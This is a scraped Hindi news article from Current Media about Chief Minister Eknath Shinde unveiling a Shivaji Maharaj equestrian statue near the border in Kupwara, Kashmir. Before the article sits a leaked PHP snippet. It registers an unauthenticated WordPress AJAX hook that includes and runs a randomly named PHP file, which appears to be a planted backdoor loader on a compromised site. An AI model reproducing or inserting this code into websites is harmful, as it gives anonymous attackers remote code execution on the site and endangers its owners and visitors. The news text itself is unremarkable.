if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }श्री छत्रपति शिवाजी महाराज का अश्वारोही पुतले का मुख्यमंत्री एकनाथ शिंदे द्वारा अनावरण - Current Media

श्री छत्रपति शिवाजी महाराज का अश्वारोही पुतले का मुख्यमंत्री एकनाथ शिंदे द्वारा अनावरण

नई दिल्ली: श्री छत्रपति शिवाजी महाराज का अश्वारोही पुतले का अनावरण, कश्मीर के कुपवाड़ा जिले में भारत-पाकिस्तान सीमा के पास 41 राष्ट्रीय राइफल्स में महाराष्ट्र के मुख्यमंत्री एकनाथ शिंदे द्वारा किया गया। छत्रपति शिवाजी महाराज का अश्वरोही पुतला सैनिकों को हमेशा प्रेरित करेगा, ऐसा विश्वास उन्होंने इस समय व्यक्त किया।
कुपवाडा मे आयोजित इस कार्यक्रम का आयोजन पुणे की आम्ही पुणेकर संस्था द्वारा किया गया। इस अवसर पर मुख्यमंत्री एकनाथ शिंदे बोल रहे थे। उन्होंने विश्वास जताया कि शिवाजी महाराज की छवि सैनिकों को सदैव प्रेरित करती रहेगी। मुख्यमंत्री ने सभी उपस्थित मान्यवरों को इस ऐतिहासिक दिवस की शुभकामनाएं दीं ।
हमें हमारे वीर जवानों पर गर्व है, तथा जिन सैनिकों ने देश के लिए शहादत दी है उन जवानों को देश सदैव याद रखेगा। छत्रपति शिवाजी महाराज की यह प्रतिमा महाराष्ट्र से कश्मीर तक सभी को प्रेरित और ऊर्जावान बनाएगी। सैनिकों को अपना मनोबल ऊंचा रखते हुए दुश्मन की छाती पर झंडा फहराने के लिए प्रेरित करेगा, ऐसी भावना श्री शिंदे ने इस मौके पर व्यक्त की। आगे बोलते हुए उन्होंने कहा कि, इस मूर्ति को देखने के बाद आतंकवादी भी कश्मीर में घुसने की हिम्मत नहीं करेंगे। मुख्यमंत्री ने विश्वास जताया कि यह स्मारक महाराष्ट्र और कश्मीर के बीच संबंधों को अधिक दृढ करेगा। देश की रक्षा के लिए सैनिक सीमा पर दिन-रात तैनात रहते हैं, जिससे देशवासी सभी त्योहार हर्षोल्लास के साथ मना पाते हैं। इस मौके पर मुख्यमंत्री ने सारे जवानों तथा उनके परिवारों को दिवाली की शुभकामनाएं दीं।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

नहीं होगी आनलाइन नीट-यूजी परीक्षा – सुप्रीम कोर्ट

ई दिल्ली । जबसे नीट का पर्चा आउट हुआ है तबसे परीक्षाओं को लेकर तरह-तरह …